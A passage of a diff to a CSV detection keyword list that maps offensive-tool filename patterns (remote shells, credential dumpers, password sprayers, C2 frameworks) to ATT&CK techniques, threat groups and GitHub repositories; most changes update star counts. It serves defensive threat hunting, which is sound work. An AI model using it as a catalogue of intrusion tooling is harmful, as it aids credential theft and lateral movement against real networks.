fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpRoast.exe*","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","9","855","177","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" -"*sharpsc *cmd*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpReg.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpRoast.exe*","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","9","857","177","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" +"*sharpsc *cmd*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*SharpSCCM*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","1","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" -"*SharpSCCM.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSCCM.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpSCShell*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" -"*SharpSearch.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpSecDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSearch.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSecDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*sharpsecretsdump*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","","N/A","","","" -"*SharpShares.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpShellPipe.exe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","97","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" -"*SharpShellPipe.sln*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","97","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" -"*SharpShellPipe-main*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","97","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" -"*SharpShooter*","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1564 - T1204 - T1059 - T1105","TA0002 - TA0011 - 
TA0008","N/A","N/A","Frameworks","https://github.com/mdsecactivebreach/SharpShooter","1","1","N/A","N/A","10","1681","352","2022-03-16T15:36:54Z","2018-03-06T20:04:20Z" +"*SharpShares.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpShellPipe.exe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*SharpShellPipe.sln*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*SharpShellPipe-main*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" 
+"*SharpShooter*","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1564 - T1204 - T1059 - T1105","TA0002 - TA0011 - TA0008","N/A","N/A","Frameworks","https://github.com/mdsecactivebreach/SharpShooter","1","1","N/A","N/A","10","1683","352","2022-03-16T15:36:54Z","2018-03-06T20:04:20Z" "*SharpShot.exe /*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"*Sharp-SMBExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpSniper.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*Sharp-SMBExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSniper.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpSocks.exe*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSocks.pfx*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSocks.resx*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" 
@@ -16712,8 +16895,8 @@ "*SharpSocksImplant*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSocksServer*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "*SharpSpawner.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SharpSphere.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpSploit*","offensive_tool_keyword","SharpSploit","SharpSploitis a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1059 - T1027 - T1505","TA0002 - TA0003 - TA0008 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","1632","321","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" +"*SharpSphere.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSploit*","offensive_tool_keyword","SharpSploit","SharpSploitis a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1059 - T1027 - T1505","TA0002 - TA0003 - TA0008 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","1632","322","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*SharpSploit.dll*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" "*SharpSploitConsole_x*","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 
- T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","275","59","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" "*SharpSploitDomainRecon*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" 
@@ -16722,17 +16905,17 @@ "*SharpSpoolTrigger.exe*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*SharpSpray*","offensive_tool_keyword","SharpSpray","This project is a C# port of my PowerSpray.ps1 script. SharpSpray a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike.","T1110 - T1558","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/jnqpblc/SharpSpray","1","1","N/A","N/A","2","176","36","2019-06-30T03:10:52Z","2019-03-04T17:14:07Z" "*SharpSpray.exe *","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" -"*SharpSpray.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSpray.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpSQLPwn*","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/lefayjey/SharpSQLPwn","1","1","N/A","N/A","1","74","15","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z" -"*SharpSQLPwn.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSQLPwn.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation 